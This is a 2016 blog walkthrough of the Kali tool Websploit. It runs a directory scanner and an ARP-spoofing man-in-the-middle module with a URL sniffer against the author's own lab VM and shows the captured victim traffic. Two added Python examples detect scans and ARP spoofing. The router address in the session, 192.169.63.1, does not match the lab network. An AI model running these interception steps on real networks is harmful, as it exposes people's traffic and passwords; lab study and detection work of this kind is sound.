Wednesday, March 30, 2016

Kali Tool Series - Websploit

Although there seem to be other, handier tools for web exploitation than Websploit, it still interests me because its interface is similar to Metasploit's.

To Start

> websploit

 __    __    ___  ____    _____ ____  _       ___  ____  ______
|  |__|  |  /  _]|    \  / ___/|    \| |     /   \|    ||      |
|  |  |  | /  [_ |  o  )(   \_ |  o  ) |    |     ||  | |      |
|  |  |  ||    _]|     | \__  ||   _/| |___ |  O  ||  | |_|  |_|
|  `  '  ||   [_ |  O  | /  \ ||  |  |     ||     ||  |   |  |
 \      / |     ||     | \    ||  |  |     ||     ||  |   |  |
  \_/\_/  |_____||_____|  \___||__|  |_____| \___/|____|  |__|


                --=[WebSploit FrameWork
        +---**---==[Version :2.0.5 BETA
        +---**---==[Codename :We're Not Crying Wolf
        +---**---==[Available Modules : 19
                --=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver


Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner


Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules            Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

Cases

Here I am going to try some modules in Websploit; the target will be my own Metasploitable2 virtual machine. Make sure you don't try any of the actions described here on a running machine that doesn't belong to you.

Scan Directories

This module brute-forces directory names on the target machine by sending an HTTP request for each candidate. As far as I know, DirBuster is the better-known tool for this job. Note that this activity is easy for the target to notice, since a large number of requests for non-existent paths are sent out in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options          Value
---------       --------------
TARGET          http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET =>  192.168.63.156

wsf > run
…

However, I don't think the program does a good job, as it doesn't print out results as it goes; the user has to wait until the scan is completed, and it usually takes a long time.
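The noisiness noted above is exactly what makes such a scan detectable. The following is an added example (not from the original post or from Websploit) of the defender's side: it reads web-server access log lines in combined log format and flags any client whose 404 responses reach a threshold within a short time window. The log lines, IP addresses and thresholds are constructed for this example.

```python
# Added example (not from the original post or Websploit): flag directory
# brute-force scans by counting 404 responses per client in a sliding window.
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the start of an Apache/nginx combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (client_ip, timestamp, status) or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, int(m.group("status"))

def find_scanners(lines, threshold=10, window_s=5):
    """Return {client_ip: timestamp} for clients whose 404 count within any
    window_s-second window reaches threshold (timestamp = when it was first hit)."""
    recent = defaultdict(deque)   # client_ip -> timestamps of its recent 404s
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[2] != 404:
            continue
        ip, ts, _ = parsed
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop 404s outside the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged

# Constructed sample log (addresses made up): a scanner requesting guessed
# directory names at two per second, plus one normal visitor.
GUESSES = ["admin", "backup", "cgi-bin", "conf", "db", "dev",
           "include", "logs", "old", "private", "secret", "test"]
SAMPLE_LOG = [
    f'192.168.63.50 - - [30/Mar/2016:17:40:{i // 2:02d} +0800] "GET /{p}/ HTTP/1.1" 404 209 "-" "-"'
    for i, p in enumerate(GUESSES)
] + ['192.168.63.20 - - [30/Mar/2016:17:40:03 +0800] "GET /index.php HTTP/1.1" 200 3412 "-" "-"']

if __name__ == "__main__":
    for ip, when in find_scanners(SAMPLE_LOG).items():
        print(f"possible directory brute-force from {ip}, threshold hit at {when:%H:%M:%S}")
```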

Man in the Middle

Man in the Middle is an interesting attack. The attacker stays silent, intercepts the victim's network traffic and then passes it on, so the victim may not notice that his/her traffic is being fully monitored by the attacker.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options          Value                           RQ      Description
---------       --------------                  ----    --------------
Interface       eth0                            yes     Network Interface Name
ROUTER          192.168.1.1                     yes     Router IP Address
TARGET          192.168.1.2                     yes     Target IP Address
SNIFFER         driftnet                        yes     Sniffer Name (Select From Sniffer List)
SSL             true                            yes     SSLStrip, For SSL Hijacking(true or false)


Sniffers         Description
------------    --------------
dsniff           Sniff All Passwords
msgsnarf         Sniff All Text Of Victim Messengers
urlsnarf         Sniff Victim Links
driftnet         Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET =>  192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER =>  192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER =>  urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then the victim starts to browse the Internet. I'm letting the victim run wget google.com to simulate Internet surfing.

Back on the attacker's side, here's what he/she received:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"
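Because the module's first step is ARP spoofing, the attack is visible to anyone watching ARP traffic on the LAN. The following is an added example (not from the original post or from Websploit) of a defender-side check: it replays a constructed list of observed ARP replies and alerts when an IP's MAC binding changes, or when one MAC answers for both the router and another host. The router IP 192.168.63.1 and every MAC address are assumed values.

```python
# Added example (not from the original post or Websploit): detect the ARP
# cache poisoning step of a MITM attack from a stream of observed ARP replies.
from collections import defaultdict

# Constructed observations (sender IP, sender MAC) of ARP replies seen on the
# LAN. Router IP, host IPs and every MAC here are assumed values.
ATTACKER_MAC = "aa:bb:cc:dd:ee:ff"
OBSERVED_REPLIES = [
    ("192.168.63.1",   "00:50:56:c0:00:08"),   # legitimate router
    ("192.168.63.156", "00:0c:29:3a:4b:5c"),   # legitimate target host
    ("192.168.63.20",  "00:0c:29:11:22:33"),   # another normal host
    ("192.168.63.1",   ATTACKER_MAC),           # attacker now answers for the router
    ("192.168.63.156", ATTACKER_MAC),           # ...and for the target
    ("192.168.63.1",   ATTACKER_MAC),           # spoofed reply repeated
]

def detect_arp_spoof(replies, router_ip):
    """Return alert strings in order of detection. Two signals are checked:
    - an IP whose MAC differs from the binding learned earlier (cache overwrite);
    - one MAC claiming the router IP plus at least one other host, which is
      what a sniffer inserted between gateway and victim looks like."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    reported = set()
    alerts = []
    for ip, mac in replies:
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append(f"{ip} changed from {known} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        victims = tuple(sorted(mac_to_ips[mac] - {router_ip}))
        if router_ip in mac_to_ips[mac] and victims and (mac, victims) not in reported:
            reported.add((mac, victims))   # report each (MAC, victim set) once
            alerts.append(f"{mac} claims router {router_ip} and {', '.join(victims)}")
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(OBSERVED_REPLIES, "192.168.63.1"):
        print("ALERT:", alert)
```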
